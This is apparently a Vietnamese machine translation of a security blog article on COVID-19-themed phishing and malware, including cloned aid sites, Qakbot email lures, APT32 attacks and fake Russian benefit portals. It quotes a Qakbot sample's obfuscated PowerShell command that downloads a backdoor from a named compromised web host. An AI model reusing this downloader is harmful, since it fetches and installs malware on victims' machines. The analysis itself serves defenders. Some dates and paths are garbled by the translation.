Những kẻ tấn công tiếp tục khai thác chủ đề COVID-19, ngày càng tạo ra nhiều mối đe dọa hơn cho những người dùng quan tâm sâu sắc đến mọi thứ liên quan đến dịch bệnh. TRONG Chúng tôi đã nói về những loại phần mềm độc hại xuất hiện sau virus Corona và hôm nay chúng tôi sẽ nói về các kỹ thuật lừa đảo xã hội mà người dùng ở các quốc gia khác nhau, bao gồm cả Nga, đã gặp phải. Các xu hướng và ví dụ chung đang được cắt giảm.
Ghi nhớ trong Chúng ta đã nói về việc mọi người sẵn sàng đọc không chỉ về virus Corona và diễn biến của dịch bệnh mà còn về các biện pháp hỗ trợ tài chính? Đây là một ví dụ điển hình. Một cuộc tấn công lừa đảo thú vị đã được phát hiện ở bang North Rhine-Westphalia hay NRW của Đức. Những kẻ tấn công đã tạo ra các bản sao của trang web Bộ Kinh tế (), nơi bất kỳ ai cũng có thể nộp đơn xin hỗ trợ tài chính. Một chương trình như vậy thực sự tồn tại và hóa ra nó lại có lợi cho những kẻ lừa đảo. Sau khi nhận được dữ liệu cá nhân của nạn nhân, họ đã đăng ký trên trang web thực sự của Bộ, nhưng chỉ ra các chi tiết ngân hàng khác. Theo dữ liệu chính thức, 4 nghìn yêu cầu giả mạo như vậy đã được thực hiện cho đến khi âm mưu này bị phát hiện. Kết quả là, 109 triệu đô la dành cho những công dân bị ảnh hưởng đã rơi vào tay những kẻ lừa đảo.
Bạn có muốn xét nghiệm miễn phí COVID-19 không?
Một ví dụ quan trọng khác về lừa đảo theo chủ đề virus Corona là trong email. Tin nhắn đã thu hút sự chú ý của người dùng với lời đề nghị tiến hành xét nghiệm miễn phí để phát hiện nhiễm vi-rút Corona. Trong phần đính kèm này đã có trường hợp Trickbot/Qakbot/Qbot. Và khi những người muốn kiểm tra sức khỏe của mình bắt đầu “điền vào biểu mẫu đính kèm”, một tập lệnh độc hại đã được tải xuống máy tính. Và để tránh thử nghiệm hộp cát, tập lệnh chỉ bắt đầu tải xuống vi-rút chính sau một thời gian, khi hệ thống bảo vệ tin chắc rằng sẽ không có hoạt động độc hại nào xảy ra.
Thuyết phục hầu hết người dùng kích hoạt macro cũng dễ dàng. Để làm điều này, một thủ thuật tiêu chuẩn đã được sử dụng: để điền vào bảng câu hỏi, trước tiên bạn cần bật macro, nghĩa là bạn cần chạy tập lệnh VBA.
Như bạn có thể thấy, tập lệnh VBA được che giấu đặc biệt khỏi các phần mềm chống vi-rút.
Windows có tính năng chờ trong đó ứng dụng đợi /T <giây> trước khi chấp nhận câu trả lời mặc định là “Có”. Trong trường hợp của chúng tôi, tập lệnh đợi 65 giây trước khi xóa các tệp tạm thời:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Và trong khi chờ đợi, phần mềm độc hại đã được tải xuống. Một tập lệnh PowerShell đặc biệt đã được đưa ra cho việc này:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Sau khi giải mã giá trị Base64, tập lệnh PowerShell tải xuống backdoor nằm trên máy chủ web bị hack trước đó ở Đức:
http://automatischer-staubsauger.com/feature/777777.pngvà lưu nó dưới tên:
C:UsersPublictmpdirfile1.exe
Thư mục ‘C:UsersPublictmpdir’ bị xóa khi chạy tệp 'tmps1.bat' chứa lệnh cmd /c mkdir ""C:UsersPublictmpdir"".
Tấn công có chủ đích vào các cơ quan chính phủ
Ngoài ra, các nhà phân tích của FireEye gần đây đã báo cáo về một cuộc tấn công APT32 có chủ đích nhằm vào các cơ quan chính phủ ở Vũ Hán, cũng như Bộ Quản lý Tình trạng Khẩn cấp của Trung Quốc. Một trong những RTF được phân phối có chứa liên kết đến một bài báo của New York Times có tựa đề . Tuy nhiên, khi đọc nó, phần mềm độc hại đã được tải xuống (các nhà phân tích của FireEye đã xác định trường hợp này là METALJACK).
Điều thú vị là tại thời điểm phát hiện, không có phần mềm diệt virus nào phát hiện được trường hợp này, theo Virustotal.
Khi các trang web chính thức ngừng hoạt động
Ví dụ nổi bật nhất về một cuộc tấn công lừa đảo đã xảy ra ở Nga mới đây. Lý do cho điều này là do việc bổ nhiệm một quyền lợi đã được mong đợi từ lâu dành cho trẻ em từ 3 đến 16 tuổi. Khi thông báo bắt đầu nhận đơn đăng ký vào ngày 12 tháng 2020 năm XNUMX, hàng triệu người đã đổ xô đến trang web Dịch vụ Nhà nước để nhận được sự trợ giúp đã chờ đợi từ lâu và việc đánh sập cổng này không tệ hơn một cuộc tấn công DDoS chuyên nghiệp. Khi tổng thống nói rằng “Các dịch vụ của Chính phủ không thể đáp ứng được dòng đơn đăng ký”, mọi người bắt đầu nói chuyện trực tuyến về việc ra mắt một trang web thay thế để chấp nhận đơn đăng ký.
Vấn đề là một số trang web bắt đầu hoạt động cùng một lúc và trong khi một trang web thực sự tại posobie16.gosuslugi.ru thực sự chấp nhận đơn đăng ký, hơn thế nữa .
Các đồng nghiệp từ SearchInform đã tìm thấy khoảng 30 miền lừa đảo mới trong vùng .ru. Công ty Infosecurity và Softline đã theo dõi hơn 70 trang web dịch vụ chính phủ giả mạo tương tự kể từ đầu tháng Tư. Những người sáng tạo ra chúng sử dụng các ký hiệu quen thuộc và cũng sử dụng sự kết hợp của các từ gosuslugi, gosuslugi-16, vyplaty, Covid-vyplaty, posobie, v.v.
Cường điệu và kỹ thuật xã hội
Tất cả những ví dụ này chỉ xác nhận rằng những kẻ tấn công đang kiếm tiền thành công từ chủ đề virus Corona. Và căng thẳng xã hội càng cao, vấn đề càng không rõ ràng thì kẻ lừa đảo càng có nhiều cơ hội đánh cắp dữ liệu quan trọng, buộc mọi người phải tự bỏ tiền hoặc đơn giản là hack thêm nhiều máy tính.
Và do đại dịch đã buộc những người có khả năng không được chuẩn bị trước phải làm việc tại nhà hàng loạt, không chỉ dữ liệu cá nhân mà cả dữ liệu của công ty cũng gặp rủi ro. Ví dụ: gần đây người dùng Microsoft 365 (trước đây là Office 365) cũng bị tấn công lừa đảo. Mọi người nhận được nhiều tin nhắn thoại “bị bỏ lỡ” dưới dạng tệp đính kèm trong thư. Tuy nhiên, các tập tin thực sự là một trang HTML gửi nạn nhân của cuộc tấn công tới . Kết quả là mất quyền truy cập và xâm phạm tất cả dữ liệu từ tài khoản.
Nguồn: www.habr.com